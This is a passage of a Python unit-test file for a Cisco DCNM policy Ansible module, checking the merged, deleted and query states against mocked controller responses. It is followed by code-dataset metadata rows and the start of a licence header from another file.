get_resp_103 = self.payloads_data.get('get_response_103')
get_resp_104 = self.payloads_data.get('get_response_104')
get_resp_105 = self.payloads_data.get('get_response_105')
self.run_dcnm_send.side_effect = [get_resp_101,
get_resp_102, get_resp_103, get_resp_104,
get_resp_105
]
if ('test_dcnm_policy_query_with_template_name' == self._testMethodName):
have_resp_101_105 = self.payloads_data.get('have_response_101_105')
self.run_dcnm_send.side_effect = [have_resp_101_105,
]
if ('test_dcnm_policy_query_with_template_name_match_multi' == self._testMethodName):
have_resp_101_105_multi = self.payloads_data.get('have_response_101_105_multi')
self.run_dcnm_send.side_effect = [have_resp_101_105_multi,
]
def load_fixtures(self, response=None, device=''):
# setup the side effects
self.run_dcnm_fabric_details.side_effect = [self.mock_fab_inv]
self.run_dcnm_ip_sn.side_effect = [[self.mock_ip_sn, []]]
# Load policy related side-effects
self.load_policy_fixtures ()
#################################### FIXTURES END ############################
#################################### TEST-CASES ##############################
def test_dcnm_policy_merged_new (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_101_105')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 5)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 5)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 5), True)
count = count + 1
def test_dcnm_policy_merged_same_template (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_101_101_5')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 5)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 5)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 5), True)
count = count + 1
def test_dcnm_policy_merged_new_check_mode (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_101_105')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
_ansible_check_mode=True,
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 5)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 5)
self.assertEqual(len(result["response"]) , 0)
def test_dcnm_policy_merged_existing (self):
# Idempotence case
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_101_105')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 5)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
count = count + 1
continue
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 5), True)
count = count + 1
def test_dcnm_policy_merged_existing_and_non_exist (self):
# Idempotence case
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_101_105')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 5)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 5), True)
count = count + 1
def test_dcnm_policy_without_state (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_without_state_104_105')
set_module_args(dict(deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 2), True)
count = count + 1
def test_dcnm_policy_merge_additional_policies (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_additional_flags_104')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 2), True)
count = count + 1
def test_dcnm_policy_merge_additional_policies_exist (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_additional_flags_104')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 2), True)
count = count + 1
def test_dcnm_policy_merge_multiple_switches (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_multi_switch_101_105')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 8)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 8)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 2), True)
self.assertEqual((len(resp["DATA"][1]["successPTIList"].split(",")) == 3), True)
self.assertEqual((len(resp["DATA"][2]["successPTIList"].split(",")) == 3), True)
count = count + 1
def test_dcnm_policy_merge_no_deploy (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_101_105')
set_module_args(dict(state='merged',
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 5)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 5)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 5), True)
count = count + 1
def test_dcnm_policy_merge_deploy_false (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_no_deploy_104')
set_module_args(dict(state='merged',
deploy=False,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 1)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual((count < max_count), True)
count = count + 1
def test_dcnm_policy_merged_new_with_vars (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_125_127_with_vars')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 3), True)
count = count + 1
def test_dcnm_policy_modify_with_template_name (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('modify_policy_104_with_template_name')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 1)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 1)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 1), True)
count = count + 1
def test_dcnm_policy_modify_with_policy_id (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('modify_policy_104_with_policy_id')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 1)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 1)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 1), True)
count = count + 1
def test_dcnm_policy_modify_policy_with_vars (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('modify_policy_125_with_vars')
set_module_args(dict(state='merged',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 1)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 1)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["merged"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("is created successfully" in resp["DATA"]["successList"][0]["message"]), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((len(resp["DATA"][0]["successPTIList"].split(",")) == 1), True)
count = count + 1
def test_dcnm_policy_delete_with_template_name (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('delete_policy_template_name_101_105')
set_module_args(dict(state='deleted',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 5)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["deleted"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((resp["DATA"]["deleted"] == True), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("Config deployment has been triggered" in resp["DATA"]["status"]), True)
else:
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("Deleted successfully" in resp["DATA"]["message"]), True)
count = count + 1
def test_dcnm_policy_delete_with_policy_id (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('delete_policy_policy_id_101_105')
set_module_args(dict(state='deleted',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 5)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["deleted"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((resp["DATA"]["deleted"] == True), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("Config deployment has been triggered" in resp["DATA"]["status"]), True)
else:
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("Deleted successfully" in resp["DATA"]["message"]), True)
count = count + 1
def test_dcnm_policy_delete_multiple_policies_with_template_name (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('delete_policy_template_name_multi')
set_module_args(dict(state='deleted',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 8)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
# Validate create and deploy responses
count = 0
max_count = len(result["diff"][0]["deleted"])
for resp in result["response"]:
if (count < max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual((resp["DATA"]["deleted"] == True), True)
elif (count == max_count):
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("Config deployment has been triggered" in resp["DATA"]["status"]), True)
else:
self.assertEqual(resp["RETURN_CODE"], 200)
self.assertEqual(("Deleted successfully" in resp["DATA"]["message"]), True)
count = count + 1
def test_dcnm_policy_delete_with_template_name_with_second_delete (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('delete_policy_template_name_101_105')
set_module_args(dict(state='deleted',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 5)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
# Validate create and deploy responses
max_count = len(result["diff"][0]["deleted"])
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_policy_query_with_switch_info (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('query_policy_with_switch_info')
set_module_args(dict(state='query',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 5)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
self.assertEqual((len(result["response"]) == 5) , True)
def test_dcnm_policy_query_with_policy_id (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('query_policy_with_policy_id')
set_module_args(dict(state='query',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 5)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
self.assertEqual((len(result["response"]) == 5) , True)
def test_dcnm_policy_query_with_template_name (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('query_policy_with_template_name')
set_module_args(dict(state='query',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 5)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
self.assertEqual((len(result["response"]) == 5) , True)
def test_dcnm_policy_query_with_template_name_match_multi (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('query_policy_with_template_name')
set_module_args(dict(state='query',
deploy=True,
fabric='mmudigon',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 5)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["diff"][0]["skipped"]) , 0)
self.assertEqual((len(result["response"]) == 8) , True)
def test_dcnm_policy_wrong_state(self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_policy_payloads')
# get mock ip_sn and fabric_inventory_details
self.mock_fab_inv = []
self.mock_ip_sn = self.payloads_data.get('mock_ip_sn')
# load required config data
self.playbook_config = self.config_data.get('create_policy_wrong_state_104')
set_module_args(dict(state='replaced',
fabric='mmudigon',
config=self.playbook_config))
result = None
try:
result = self.execute_module(changed=False, failed=False)
except:
self.assertEqual (result, None)
| 48.429655
| 136
| 0.598876
| 6,564
| 57,486
| 4.911639
| 0.038239
| 0.084677
| 0.08139
| 0.082506
| 0.938151
| 0.929001
| 0.913555
| 0.901365
| 0.876861
| 0.859988
| 0
| 0.034707
| 0.287774
| 57,486
| 1,186
| 137
| 48.470489
| 0.752729
| 0.066486
| 0
| 0.784409
| 0
| 0
| 0.171986
| 0.079555
| 0
| 0
| 0
| 0
| 0.221681
| 1
| 0.036541
| false
| 0.001218
| 0.00609
| 0
| 0.046285
| 0.001218
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54b3202a6b5750d675b0cca120c7416f9ef17a78
| 94
|
py
|
Python
|
tensorflow_encrypted/protocol/unencrypted_native.py
|
OshanIvantha/tf-encrypted
|
538e4857fa7adaa024a03c532ba3b5d78d89d1b9
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_encrypted/protocol/unencrypted_native.py
|
OshanIvantha/tf-encrypted
|
538e4857fa7adaa024a03c532ba3b5d78d89d1b9
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_encrypted/protocol/unencrypted_native.py
|
OshanIvantha/tf-encrypted
|
538e4857fa7adaa024a03c532ba3b5d78d89d1b9
|
[
"Apache-2.0"
] | null | null | null |
from ..protocol import Protocol
class UnencryptedNative(Protocol):
# TODO
pass
| 11.75
| 34
| 0.680851
| 9
| 94
| 7.111111
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255319
| 94
| 8
| 35
| 11.75
| 0.914286
| 0.042553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
49b68699f166eb37ec18d6505f7134a934e233d5
| 26,180
|
py
|
Python
|
scripts/run_deeptrio_test.py
|
google/deepvariant
|
9cf1c7b0e2342d013180aa153cba3c9331c9aef7
|
[
"BSD-3-Clause"
] | 2,553
|
2017-12-04T15:10:17.000Z
|
2022-03-24T09:05:14.000Z
|
scripts/run_deeptrio_test.py
|
google/deepvariant
|
9cf1c7b0e2342d013180aa153cba3c9331c9aef7
|
[
"BSD-3-Clause"
] | 501
|
2017-12-04T18:34:33.000Z
|
2022-03-31T13:30:50.000Z
|
scripts/run_deeptrio_test.py
|
google/deepvariant
|
9cf1c7b0e2342d013180aa153cba3c9331c9aef7
|
[
"BSD-3-Clause"
] | 730
|
2017-12-04T18:53:46.000Z
|
2022-03-29T03:33:11.000Z
|
# Copyright 2019 Google LLC.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
